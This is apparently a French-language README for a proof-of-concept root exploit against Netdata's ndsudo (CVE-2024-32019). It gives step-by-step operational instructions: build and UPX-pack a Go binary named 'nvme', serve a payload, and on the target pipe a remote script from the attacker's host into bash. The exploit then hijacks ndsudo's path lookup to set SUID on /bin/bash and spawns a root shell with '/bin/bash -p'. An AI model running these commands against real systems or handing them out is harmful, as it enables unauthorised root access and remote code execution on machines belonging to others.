
Netdata ndsudo PoC
Preuve de concept Netdata ndsudo
Construire le binaire :
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
Exécuter le script bash :
bash exploit.sh <YOUR IP>
Sur la machine cible, exécuter dans un répertoire accessible en écriture :
curl http://<YOUT IP>:8000/payload.sh | bash
Il téléchargera automatiquement le binaire nvme, exportera le chemin, exécutera ndsudo et ajoutera SUID à /bin/bash.
Vous devrez probablement modifier le chemin de ndsudo dans exploit.sh
Pour élever les privilèges, exécutez simplement :
/bin/bash -p
L'exploit est basé sur https://github.com/AzureADTrent/CVE-2024-32019-POC, lorsque je l'ai testé, j'ai eu l'erreur :
execve: Exec format error
C'est pourquoi j'ai décidé de créer le mien avec Go.